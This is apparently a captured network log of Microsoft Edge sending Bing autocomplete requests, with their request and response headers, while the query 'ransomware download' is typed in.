set-cookie: MUID=18E78E90E884692308719AA4E9196881; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=18E78E90E884692308719AA4E9196881; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=3322F07D9A726B36322CE4499BEF6A53; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=BC14C05607AA43CB8AE1BD6CF4B178AE&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=3322F07D9A726B36322CE4499BEF6A53; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220706.b312c81
-
GEThttps://www.bing.com/qbox?query=ransomwar&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=9afd8ef73a714186bf1277b891c52b3d&oit=1&cp=9&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomwar&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=9afd8ef73a714186bf1277b891c52b3d&oit=1&cp=9&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a362037a489bbece4061e86ccf7a
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-TKqejCKGLUqut+8Gz19DaH0RufW9A38jh+q1HrA9lI4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:46 GMT
set-cookie: MUID=00590DB4CBD465303CFD1980CAD3644F; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=00590DB4CBD465303CFD1980CAD3644F; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1A2465A7969962E418A27193979E637C; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=C203CC80FAE249CDAEE1E78C6D92C531&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=1A2465A7969962E418A27193979E637C; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220706.b312eba
-
GEThttps://www.bing.com/qbox?query=ransomware&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=fff481f46e6d490d9b251809195119a9&oit=1&cp=10&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomware&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=fff481f46e6d490d9b251809195119a9&oit=1&cp=10&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a362e6534fe085f170aa9286fc73
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-QaTC3VZ0WQbu7aWd6wk/EelLnlZv8TAMFPNyHnqSdsA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:46 GMT
set-cookie: MUID=079405DFFA776EA80C3011EBFB4D6F91; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=079405DFFA776EA80C3011EBFB4D6F91; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=3AC461934BBB69C41B2C75A74A816876; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=D21528CFC0A34734B0FA95BA9395AFDD&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=3AC461934BBB69C41B2C75A74A816876; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220706.b312fb3
-
GEThttps://www.bing.com/qbox?query=ransomware+&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=e30a68b27d4c4a3b9f92e1fdf1c63b44&oit=1&cp=11&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomware+&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=e30a68b27d4c4a3b9f92e1fdf1c63b44&oit=1&cp=11&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a363601c48eda79d736f69fe1fe4
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-1bRhVEnoj0bu2HtMCJyMQlrXyQCu+kmGCYeR5PHeZYo='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:47 GMT
set-cookie: MUID=394E7FFBA19E63B508CE6BCFA078628C; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=394E7FFBA19E63B508CE6BCFA078628C; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=0902F982C0E56F4700F5EDB6C1036E56; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=E631AAB092CA448B9AD256ED95319E30&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=0902F982C0E56F4700F5EDB6C1036E56; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220707.b3136c2
-
GEThttps://www.bing.com/qbox?query=ransomware+do&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=ddefcba0c7bb4d0fa9dd7f025ff46e05&oit=4&cp=13&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomware+do&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=ddefcba0c7bb4d0fa9dd7f025ff46e05&oit=4&cp=13&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a3632db042198bc7f008ac6cd6e4
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-z7zjG8QG4nwT7qFp3TCsd6AV0A8uQnxwA2qacUIV0+8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:47 GMT
set-cookie: MUID=2BD9F20494956E133408E630951E6F7A; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=2BD9F20494956E133408E630951E6F7A; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1C28B0861162669A32A2A4B210E967E0; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=E75C2B18BB914CB790924A0671DA73B5&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=1C28B0861162669A32A2A4B210E967E0; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220707.b31382f
-
GEThttps://www.bing.com/qbox?query=ransomware+dow&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=b88ef8b4b1614b91a1a1a6c417bfc0aa&oit=4&cp=14&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomware+dow&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=b88ef8b4b1614b91a1a1a6c417bfc0aa&oit=4&cp=14&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a363d0c844e79abe0cdda4957673
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-xYRdchOW55MJf76sKB7FrtKNOqYe9Yg5LADfV5gGS9I='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:47 GMT
set-cookie: MUID=22D5862AD9F769EC37C9921ED8D06882; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=22D5862AD9F769EC37C9921ED8D06882; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1CEE70B9327966032A3C648D335E67C3; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=813138F337894F4B8E25F747896D5D4F&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=1CEE70B9327966032A3C648D335E67C3; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220707.b313a49
-
GEThttps://www.bing.com/qbox?query=ransomware+down&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=2688ab1066ec4513984b3c572f0cceab&oit=4&cp=15&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomware+down&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=2688ab1066ec4513984b3c572f0cceab&oit=4&cp=15&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a3637dc444c8ae66aa48fb2f157f
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-9+3aZgRkJRnLhnSCAyoRyLFHQarwmjLvP7UYXjNQIIY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:48 GMT
set-cookie: MUID=0922BD2C281A68732E99A9182981698B; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=0922BD2C281A68732E99A9182981698B; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=23B62541FA956CB039C53175FB0E6DEC; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=F55BA113B81C4EB5B8528ABA56FA6CB5&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:47 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=23B62541FA956CB039C53175FB0E6DEC; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220707.b313b83
-
GEThttps://www.bing.com/qbox?query=ransomware+downl&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=d1e8b050ebc444f5afda5b1eaf825f13&oit=4&cp=16&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomware+downl&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=d1e8b050ebc444f5afda5b1eaf825f13&oit=4&cp=16&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a3643a2044a9925e77f4c8f840f6
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-LUUrZCbvYK7puH+Zaiuae5fx48998Sxih+6xP+ZJUQg='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:48 GMT
set-cookie: MUID=085BA615830B694003E0B2218261688F; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=085BA615830B694003E0B2218261688F; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1BB9A98B7A3069710ED5BDBF7B5A68B0; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=681C0807B90D4D7284E5EBD16BE04824&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=1BB9A98B7A3069710ED5BDBF7B5A68B0; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220708.b313cd5
-
GEThttps://www.bing.com/qbox?query=ransomware+downlo&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=dc160efbceae48ff8bab6489e6fe5217&oit=4&cp=17&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomware+downlo&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=dc160efbceae48ff8bab6489e6fe5217&oit=4&cp=17&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
cache-control: private, max-age=0
content-encoding: br
expires: Thu, 29 Feb 2024 15:30:48 GMT
vary: Accept-Encoding
x-eventid: 65e0a36492484f42b32bdb23ff8003bf
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-r1Alu+tATmhYujuuqyNLgbXXBTdKYZVsrGoNkKZeqfI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
report-to: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":0.5,"include_subdomains":true}
cross-origin-embedder-policy-report-only: require-corp; report-to="crossorigin-errors"
cross-origin-opener-policy-report-only: same-origin; report-to="crossorigin-errors"
date: Thu, 29 Feb 2024 15:31:48 GMT
